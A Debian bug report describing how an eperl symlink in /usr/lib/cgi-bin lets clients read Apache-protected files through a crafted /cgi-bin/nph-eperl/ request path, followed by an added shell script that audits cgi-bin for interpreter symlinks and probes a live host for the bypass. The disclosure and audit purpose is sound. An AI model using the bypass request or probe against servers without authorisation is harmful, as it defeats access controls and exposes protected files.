eperl can be used to read files that the web server access control rules deny access to. The problem is that a symlink to eperl is installed in /usr/lib/cgi-bin, so any protected file ending in an extension which eperl decides to handle (including .html) can be read. E.g. if Apache's DocumentRoot is set to /var/www, and /var/www/protected is restricted to access by certain hosts, it is possible to read /var/www/protected/index.html by requesting /cgi-bin/nph-eperl/protected/index.html.
eperl, and other interpreters / server-side languages should probably not be installed in /usr/lib/cgi-bin; perhaps debian-policy should mention this in the section on web servers and cgi-bin (at the moment it says that all CGI scripts should be there). Unfortunately moving interpreters from /usr/lib/cgi-bin will prevent their use as a server-side language in Apache using the AddType and Action directives, so it's back to shebang lines, I guess.

-- System Information
Debian Release: 2.2
Kernel Version: Linux lamia 2.2.14 #1 Tue Feb 1 20:45:54 GMT 2000 i686 unknown

Versions of the packages eperl depends on:
hi  libc6        2.1.2-13      GNU C Library: Shared libraries and Timezone
ii  libgdbmg1    1.7.3-26.2    GNU dbm database routines (runtime version).
ii  perl-5.005   5.005.03-5.3  Larry Wall's Practical Extracting and Report

--
"Damaged people are dangerous, they know they can survive"
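The two checks below are an added example and not part of the bug report or of the eperl package: the first audits a cgi-bin directory for symlinks that point at interpreters living elsewhere (the setup that makes the PATH_INFO bypass above possible), the second builds the /cgi-bin/<interpreter>/<protected path> request and, against a live server, compares it with a direct request. The directory path, the interpreter name nph-eperl and the protected path /protected/index.html are taken from the report; the hostname and the use of curl are assumptions.

```shell
#!/bin/sh
# Added example (not from the bug report or the eperl package).

# List symlinks in the given cgi-bin directory whose target resolves outside
# it, e.g. /usr/lib/cgi-bin/nph-eperl -> /usr/bin/eperl.  Each hit is printed
# as "link -> target"; a symlink to another file inside the directory is not
# reported.
find_interpreter_links() {
    dir=$1
    for f in "$dir"/*; do
        [ -L "$f" ] || continue
        target=$(readlink "$f")
        case $target in
            /*) ;;                            # absolute target: keep as-is
            *)  target="$dir/$target" ;;      # relative target: resolve from dir
        esac
        case $target in
            "$dir"/*) ;;                      # stays inside cgi-bin: not an interpreter escape
            *) printf '%s -> %s\n' "$f" "$target" ;;
        esac
    done
}

# Build the URL path that reaches a DocumentRoot-relative protected file
# through an interpreter installed in /cgi-bin: the file path becomes
# PATH_INFO for the interpreter, which then opens it itself.
bypass_path() {
    interp=$1         # e.g. nph-eperl
    protected=$2      # e.g. /protected/index.html
    printf '/cgi-bin/%s%s\n' "$interp" "$protected"
}

# Probe a live server (assumed hostname, needs curl; not exercised offline).
# A direct request to the protected file should be refused (403); the same
# file fetched via the interpreter returning 200 means the access control
# rules were bypassed.
probe() {
    host=$1
    protected=$2
    interp=${3:-nph-eperl}
    direct=$(curl -s -o /dev/null -w '%{http_code}' "http://$host$protected")
    via=$(curl -s -o /dev/null -w '%{http_code}' "http://$host$(bypass_path "$interp" "$protected")")
    echo "direct=$direct via_interpreter=$via"
    if [ "$direct" = 403 ] && [ "$via" = 200 ]; then
        echo "VULNERABLE: $protected readable via /cgi-bin/$interp"
    fi
}

# Usage (assumed host):
#   find_interpreter_links /usr/lib/cgi-bin
#   probe www.example.org /protected/index.html nph-eperl
```

The audit only flags symlinks that leave the cgi-bin directory, since those are the ones that hand a general-purpose interpreter to anonymous clients; a symlink between two scripts inside cgi-bin is harmless for this bug. The probe compares status codes rather than bodies so it works on any host/Location restriction, not just the /var/www/protected case in the report.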

